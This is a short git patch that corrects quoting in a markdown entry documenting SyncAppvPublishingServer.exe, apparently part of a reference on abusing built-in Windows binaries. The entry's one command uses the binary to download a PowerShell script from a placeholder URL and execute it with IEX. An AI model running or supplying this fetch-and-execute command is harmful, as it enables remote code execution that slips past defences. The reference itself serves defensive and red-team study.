From e3128444f504eca44f4a2f1042cd24952757c799 Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Fri, 20 Mar 2020 10:47:25 -0600 Subject: [PATCH] fix some quote and paren issues --- md/Syncappvpublishingserver.exe.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/md/Syncappvpublishingserver.exe.md b/md/Syncappvpublishingserver.exe.md index 1666c76..f797e2b 100644 --- a/md/Syncappvpublishingserver.exe.md +++ b/md/Syncappvpublishingserver.exe.md @@ -1,7 +1,7 @@ ## Syncappvpublishingserver.exe ``` -SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString("http://some.url/script.ps1") | IEX +SyncAppvPublishingServer.exe "n;(New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX" Execute powershell code from URL ``` * Windows binary: True